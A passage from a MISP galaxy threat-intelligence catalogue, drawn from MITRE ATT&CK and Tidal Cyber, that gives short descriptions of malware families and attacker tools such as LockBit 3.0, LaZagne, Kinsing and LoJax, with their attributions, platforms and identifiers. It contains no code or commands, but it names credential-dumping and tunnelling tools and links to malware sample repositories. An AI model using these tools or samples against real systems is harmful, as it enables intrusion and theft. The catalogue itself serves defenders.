tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

KARAE

KARAE is a backdoor typically used by APT37 as first-stage malware. [FireEye APT37 Feb 2018]

Internal MISP references

UUID ca883d21-97ca-420d-a66b-ef19a8355467 which can be used as unique global reference for KARAE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0215
source MITRE
type ['malware']
Related clusters

Kasidet

Kasidet is a backdoor that has been dropped by using malicious VBA macros. [Zscaler Kasidet]

Internal MISP references

UUID 1896b9c9-a93e-4220-b4c2-6c4c9c5ca297 which can be used as unique global reference for Kasidet in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0088
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

Kazuar

Kazuar is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. [Unit 42 Kazuar May 2017]

Internal MISP references

UUID e93990a0-4841-4867-8b74-ac2806d787bf which can be used as unique global reference for Kazuar in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Windows']
software_attack_id S0265
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

Kerrdown

Kerrdown is a custom downloader that has been used by APT32 since at least 2018 to install spyware from a server on the victim's network.[Amnesty Intl. Ocean Lotus February 2021][Unit 42 KerrDown February 2019]

Internal MISP references

UUID 17c28e46-1005-4737-8567-d4ad9f1aefd1 which can be used as unique global reference for Kerrdown in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0585
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

Kessel

Kessel is a modified version of OpenSSH that acts as a custom backdoor, mainly used to steal credentials and function as a bot. Kessel has been active since its C2 domain began resolving in August 2018.[ESET ForSSHe December 2018]

Internal MISP references

UUID 32f1e0d3-753f-4b51-aec5-cfaa393cedc3 which can be used as unique global reference for Kessel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0487
source MITRE
type ['malware']

Kevin

Kevin is a backdoor implant written in C++ that has been used by HEXANE since at least June 2020, including in operations against organizations in Tunisia.[Kaspersky Lyceum October 2021]

Internal MISP references

UUID b9730d7c-aa57-4d6f-9125-57dcb65b02e0 which can be used as unique global reference for Kevin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1020
source MITRE
type ['malware']
Related clusters

KeyBoy

KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[CitizenLab KeyBoy Nov 2016][PWC KeyBoys Feb 2017]

Internal MISP references

UUID 6ec39371-d50b-43b6-937c-52de00491eab which can be used as unique global reference for KeyBoy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0387
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Keydnap

Keydnap is macOS malware that steals the contents of the user's keychain while maintaining a permanent backdoor.[OSX Keydnap malware]

Internal MISP references

UUID aefbe6ff-7ce4-479e-916d-e8f0259d81f6 which can be used as unique global reference for Keydnap in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0276
source MITRE
type ['malware']

KEYMARBLE

KEYMARBLE is a Trojan that has reportedly been used by the North Korean government. [US-CERT KEYMARBLE Aug 2018]

Internal MISP references

UUID a644f61e-6a9b-41ab-beca-72518351c27f which can be used as unique global reference for KEYMARBLE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0271
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

KEYPLUG

KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.[Mandiant APT41]

Internal MISP references

UUID ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a which can be used as unique global reference for KEYPLUG in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S1051
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

KGH_SPY

KGH_SPY is a modular suite of tools used by Kimsuky for reconnaissance, information stealing, and backdoor capabilities. KGH_SPY derived its name from PDB paths and internal names found in samples containing "KGH".[Cybereason Kimsuky November 2020]

Internal MISP references

UUID c1e1ab6a-d5ce-4520-98c5-c6df41005fd9 which can be used as unique global reference for KGH_SPY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0526
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

KillDisk

KillDisk is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of BlackEnergy malware during cyber attacks against Ukraine in 2015. KillDisk has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some KillDisk variants.[KillDisk Ransomware][ESEST Black Energy Jan 2016][Trend Micro KillDisk 1][Trend Micro KillDisk 2]

Internal MISP references

UUID b5532e91-d267-4819-a05d-8c5358995add which can be used as unique global reference for KillDisk in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0607
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Kinsing

Kinsing is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. [Aqua Kinsing April 2020][Sysdig Kinsing November 2020][Aqua Security Cloud Native Threat Report June 2021]

Internal MISP references

UUID 7b4f157c-4b34-4f55-9c20-ff787495e9ba which can be used as unique global reference for Kinsing in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Containers']
software_attack_id S0599
source MITRE
tags ['efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e']
type ['malware']

Kivars

Kivars is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by BlackTech in a 2010 campaign.[TrendMicro BlackTech June 2017]

Internal MISP references

UUID 673ed346-9562-4997-80b2-e701b1a99a58 which can be used as unique global reference for Kivars in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0437
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Koadic

Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. Koadic has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.[Github Koadic][Palo Alto Sofacy 06-2018][MalwareBytes LazyScripter Feb 2021]

Internal MISP references

UUID 5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd which can be used as unique global reference for Koadic in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0250
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

Kobalos

Kobalos is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. Kobalos has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. Kobalos was first identified in late 2019.[ESET Kobalos Feb 2021][ESET Kobalos Jan 2021]

Internal MISP references

UUID bf918663-90bd-489e-91e7-6951a18a25fd which can be used as unique global reference for Kobalos in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0641
source MITRE
type ['malware']

KOCTOPUS

KOCTOPUS's batch variant is a loader used by LazyScripter since 2018 to launch Octopus and Koadic and, in some cases, QuasarRAT. KOCTOPUS also has a VBA variant with the same functionality as the batch version.[MalwareBytes LazyScripter Feb 2021]

Internal MISP references

UUID 3e13d07d-d9e1-4456-bec3-b2375e404753 which can be used as unique global reference for KOCTOPUS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0669
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Komplex

Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX [XAgentOSX 2017] [Sofacy Komplex Trojan].

Internal MISP references

UUID 2cf1be0d-2fba-4fd0-ab2f-3695716d1735 which can be used as unique global reference for Komplex in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0162
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

KOMPROGO

KOMPROGO is a signature backdoor used by APT32 that is capable of process, file, and registry management. [FireEye APT32 May 2017]

Internal MISP references

UUID 3067f148-2e2b-4aac-9652-59823b3ad4f1 which can be used as unique global reference for KOMPROGO in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0156
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

KONNI

KONNI is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. KONNI has significant code overlap with the NOKKI malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking KONNI to APT37.[Talos Konni May 2017][Unit 42 NOKKI Sept 2018][Unit 42 Nokki Oct 2018][Medium KONNI Jan 2020][Malwarebytes Konni Aug 2021]

Internal MISP references

UUID d381de2a-30cb-4d50-bbce-fd1e489c4889 which can be used as unique global reference for KONNI in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0356
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

KOPILUWAK

KOPILUWAK is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.[Mandiant Suspected Turla Campaign February 2023]

Internal MISP references

UUID d09c4459-1aa3-547d-99f4-7ac73b8043f0 which can be used as unique global reference for KOPILUWAK in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1075
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Kwampirs

Kwampirs is a backdoor Trojan used by Orangeworm. It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. [Symantec Orangeworm April 2018]

Internal MISP references

UUID 35ac4018-8506-4025-a9e3-bd017700b3b3 which can be used as unique global reference for Kwampirs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0236
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Launch-VsDevShell

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet

Author: Nasreddine Bencherchali

Paths:
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1
* C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1

Resources: * https://twitter.com/nas_bench/status/1535981653239255040

Detection: * Sigma: proc_creation_win_lolbin_launch_vsdevshell.yml[Launch-VsDevShell.ps1 - LOLBAS Project]

Internal MISP references

UUID 288b2ab2-255a-457a-a6eb-02ee4711d6b8 which can be used as unique global reference for Launch-VsDevShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5258
source Tidal Cyber
tags ['5be0da70-9249-44fa-8c3b-7394ef26b2e0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.[GitHub LaZagne Dec 2018]

Internal MISP references

UUID f5558af4-e3e2-47c2-b8fe-72850bd30f37 which can be used as unique global reference for LaZagne in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S0349
source MITRE
tags ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '26c5dec7-3184-4873-ae20-9558a498a27f', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c']
type ['tool']
Related clusters

To see the related clusters, click here.

Ldifde

Ldifde is a Windows command-line tool that is used to create, modify, and delete directory objects. Ldifde can also be used to "extend the schema, export Active Directory user and group information to other applications or services, and populate Active Directory Domain Services (AD DS) with data from other directory services".[Ldifde Microsoft]

Internal MISP references

UUID d0ff555f-ba74-457c-b6e4-02962c230b60 which can be used as unique global reference for Ldifde in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5017
source Tidal Cyber
tags ['cea43301-9f7a-46a5-be3a-3a09f0f3c09e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

LEMURLOOT

LEMURLOOT is a web shell written in C# that was used by threat actors after exploiting a MOVEit file transfer software vulnerability (CVE-2023-34362) during a campaign beginning in late May 2023. The malware supports staging and exfiltration of compressed victim data, including files and folders stored on vulnerable MOVEit servers.[Mandiant MOVEit Transfer June 2 2023]

Related Vulnerabilities: CVE-2023-34362[U.S. CISA CL0P CVE-2023-34362 Exploitation][Mandiant MOVEit Transfer June 2 2023]

Internal MISP references

UUID d5d79a51-3756-40de-81cd-4dac172fbb74 which can be used as unique global reference for LEMURLOOT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5020
source Tidal Cyber
tags ['15787198-6c8b-4f79-bf50-258d55072fee', 'a98d7a43-f227-478e-81de-e7299639a355', '173e1480-8d9b-49c5-854d-594dde9740d6', '311abf64-a9cc-4c6a-b778-32c5df5658be']
type ['malware']

Level

According to joint Cybersecurity Advisory AA23-320A (November 2023), Level is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]

Internal MISP references

UUID bce485ad-7d4f-45b6-b3c1-218f2f757611 which can be used as unique global reference for Level in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5067
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

LightNeuron

LightNeuron is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. LightNeuron has been used by Turla to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of LightNeuron exists.[ESET LightNeuron May 2019]

Internal MISP references

UUID c9d2f023-d54b-4d08-9598-a42fb92b3161 which can be used as unique global reference for LightNeuron in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0395
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Ligolo

Ligolo is a tool used to establish SOCKS5 or TCP tunnels from a reverse connection.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 3113cb05-23b4-4f90-ab7a-623b800302ce which can be used as unique global reference for Ligolo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5034
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'febea5b6-2ea2-402b-8bec-f3f5b3f73c59', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Linfo

Linfo is a rootkit trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Linfo May 2012]

Internal MISP references

UUID 925975f8-e8ff-411f-a40e-f799968046f7 which can be used as unique global reference for Linfo in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0211
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Linux Rabbit

Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.[Anomali Linux Rabbit 2018]

Internal MISP references

UUID d017e133-fce9-4982-a2df-6867a80089e7 which can be used as unique global reference for Linux Rabbit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux']
software_attack_id S0362
source MITRE
tags ['b20e7912-6a8d-46e3-8e13-9a3fc4813852', '70dc52b0-f317-4134-8a42-71aea1443707']
type ['malware']

LiteDuke

LiteDuke is a third-stage backdoor that was used by APT29, primarily in 2014-2015. LiteDuke used the same dropper as PolyglotDuke, and was found on machines also compromised by MiniDuke.[ESET Dukes October 2019]

Internal MISP references

UUID 71e4028c-9ca1-45ce-bc44-98209ae9f6bd which can be used as unique global reference for LiteDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0513
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

LitePower

LitePower is a downloader and second-stage malware that has been used by WIRTE since at least 2021.[Kaspersky WIRTE November 2021]

Internal MISP references

UUID cc568409-71ff-468b-9c38-d0dd9020e409 which can be used as unique global reference for LitePower in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0680
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Lizar

Lizar is a modular remote access tool written using the .NET Framework that shares structural similarities with Carbanak. It has likely been used by FIN7 since at least February 2021.[BiZone Lizar May 2021][Threatpost Lizar May 2021][Gemini FIN7 Oct 2021]

Internal MISP references

UUID 65d46aab-b3ce-4f5b-b1fc-871db2573fa1 which can be used as unique global reference for Lizar in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0681
source MITRE
tags ['15787198-6c8b-4f79-bf50-258d55072fee', '992bdd33-4a47-495d-883a-58010a2f0efb', '84615fe0-c2a5-4e07-8957-78ebc29b4635', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

LockBit 3.0

Ransomware labeled “LockBit” was first observed in 2020, and since that time, the LockBit group and its affiliates have carried out a very large number of attacks involving a wide range of victims around the world.[U.S. CISA Understanding LockBit June 2023]

LockBit developers have introduced multiple versions of the LockBit encryption tool. According to the U.S. Cybersecurity and Infrastructure Security Agency (“CISA”), the following major LockBit variants have been observed (first-observed dates in parentheses): ABCD (LockBit malware’s predecessor; September 2019), LockBit (January 2020), LockBit 2.0 (June 2021), LockBit Linux-ESXi Locker (October 2021), LockBit 3.0 (September 2022), LockBit Green (a variant that incorporates source code from Conti ransomware; January 2023), and variants capable of targeting macOS environments (April 2023). As of June 2023, CISA reported that the web panel that offers affiliates access to LockBit malware explicitly listed the LockBit 2.0, LockBit 3.0, LockBit Green, and LockBit Linux-ESXi Locker variants.[U.S. CISA Understanding LockBit June 2023] According to CISA, LockBit 3.0 (also known as “LockBit Black”) shares code similarities with Blackmatter and BlackCat ransomware and is “more modular and evasive” than previous LockBit strains.[U.S. CISA LockBit 3.0 March 2023]

According to data collected by the ransomwatch project and analyzed by Tidal, LockBit actors publicly claimed 970 victims in 2022 (394 associated with LockBit 3.0), the most of any extortion threat that year. Through April 2023, LockBit had claimed 406 victims (all associated with LockBit 3.0), more than double the number of the next threat (Clop, with 179 victims).[GitHub ransomwatch]

Delivered By: Cobalt Strike[Sentinel Labs LockBit 3.0 July 2022], PsExec[NCC Group Research Blog August 19 2022]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/lockbit/

PulseDive (IOCs): https://pulsedive.com/threat/LockBit

Internal MISP references

UUID 08c70ea5-9d4d-4146-826e-c5ebd5490378 which can be used as unique global reference for LockBit 3.0 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5047
source Tidal Cyber
tags ['562e535e-19f5-4d6c-81ed-ce2aec544f09', 'fdd53e62-5bf1-41f1-8bd6-b970a866c39d', 'd431939f-2dc0-410b-83f7-86c458125444', '5e7433ad-a894-4489-93bc-41e90da90019', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

LockerGoga

LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[Unit42 LockerGoga 2019][CarbonBlack LockerGoga 2019]

Internal MISP references

UUID 65bc8e81-0a08-49f6-9d04-a2d63d512342 which can be used as unique global reference for LockerGoga in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0372
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

LogMeIn

LogMeIn provides multiple freely available tools that can be used for remote access to systems, including the flagship Rescue tool.[LogMeIn Homepage] Adversary groups, including the Royal ransomware operation and LAPSUS$, have used LogMeIn remote access software for initial access to and persistence within victim networks.[CISA Royal AA23-061A March 2023][CSRB LAPSUS$ July 24 2023]

Internal MISP references

UUID 7b471178-30a1-4c48-bbff-c4d2fdbb35a9 which can be used as unique global reference for LogMeIn in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5073
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236']
type ['tool']
Related clusters

To see the related clusters, click here.

LoJax

LoJax is a UEFI rootkit used by APT28 to persist remote access software on targeted systems.[ESET LoJax Sept 2018]

Internal MISP references

UUID 039f34e9-f379-4a24-a53f-b28ba579854c which can be used as unique global reference for LoJax in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0397
source MITRE
tags ['1efd43ee-5752-49f2-99fe-e3441f126b00']
type ['malware']
Related clusters

To see the related clusters, click here.

Lokibot

Lokibot is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. Lokibot can also create a backdoor into infected systems to allow an attacker to install additional payloads.[Infoblox Lokibot January 2019][Morphisec Lokibot April 2020][CISA Lokibot September 2020]

Internal MISP references

UUID 4fead65c-499d-4f44-8879-2c35b24dac68 which can be used as unique global reference for Lokibot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0447
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

LookBack

LookBack is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using LookBack.[Proofpoint LookBack Malware Aug 2019][Dragos TALONITE][Dragos Threat Report 2020]

Internal MISP references

UUID bfd2a077-5000-4500-82c4-5c85fb98dd5a which can be used as unique global reference for LookBack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0582
source MITRE
type ['malware']

LostMyPassword

LostMyPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]

Internal MISP references

UUID 41041d5d-0866-4a57-92b7-d075d8b344ad which can be used as unique global reference for LostMyPassword in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5035
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

LoudMiner

LoudMiner is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.[ESET LoudMiner June 2019]

Internal MISP references

UUID f503535b-406c-4e24-8123-0e22fec995bb which can be used as unique global reference for LoudMiner in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Windows']
software_attack_id S0451
source MITRE
tags ['a2e000da-8181-4327-bacd-32013dbd3654']
type ['malware']

LOWBALL

LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations. [FireEye admin@338]

Internal MISP references

UUID fce1117a-e699-4aef-b1fc-04c3967acc33 which can be used as unique global reference for LOWBALL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0042
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Lslsass

Lslsass is a publicly available tool that can dump active logon session password hashes from the lsass process.[Mandiant APT1]

Internal MISP references

UUID 37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc which can be used as unique global reference for Lslsass in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0121
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

Lucifer

Lucifer is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.[Unit 42 Lucifer June 2020]

Internal MISP references

UUID 723d9a27-74fd-4333-a8db-63df2a8b4dd4 which can be used as unique global reference for Lucifer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0532
source MITRE
type ['malware']

Lurid

Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006. [Villeneuve 2014] [Villeneuve 2011]

Internal MISP references

UUID 0cc9e24b-d458-4782-a332-4e4fd68c057b which can be used as unique global reference for Lurid in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0010
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Machete

Machete is a cyber espionage toolset used by Machete. It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[ESET Machete July 2019][Securelist Machete Aug 2014][360 Machete Sep 2020]

Internal MISP references

UUID be8a1630-9562-41ad-a621-65989f961a10 which can be used as unique global reference for Machete in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0409
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

MacMa

MacMa is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. MacMa has been observed in the wild since November 2021.[ESET DazzleSpy Jan 2022]

Internal MISP references

UUID 7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb which can be used as unique global reference for MacMa in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S1016
source MITRE
type ['malware']

macOS.OSAMiner

